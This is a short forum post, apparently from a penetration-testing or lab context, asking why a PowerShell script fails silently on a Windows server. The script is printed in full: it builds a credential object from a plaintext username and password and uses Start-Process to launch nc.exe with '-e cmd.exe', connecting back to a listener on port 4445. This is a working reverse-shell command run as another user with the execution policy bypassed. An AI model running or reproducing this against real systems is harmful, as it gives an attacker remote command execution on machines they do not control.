Hello,
I’m puzzled as to why this wouldn’t work on a Windows server; I have tested this locally and it works. Any hint as to why it would fail silently? (It returns to the prompt after executing as powershell.exe -ExecutionPolicy Bypass -File .\revshell.ps1):
# Account the reverse shell should run as
$username='someUser'
$password='somePassword'
# PSCredential needs the password as a SecureString
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
# Launch nc.exe (relative path) as that user, connecting back to the listener on 4445
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential
If I put in the wrong user/pass I’ll get a PowerShell error. This just never sticks for some reason, and I get 0 pings back on my local 4445 listener.
nc.exe is obviously in the same directory as the script, and I am executing the script from the same directory. I have used nc.exe directly to spawn a reverse shell (without using PowerShell) successfully as well.
Thanks,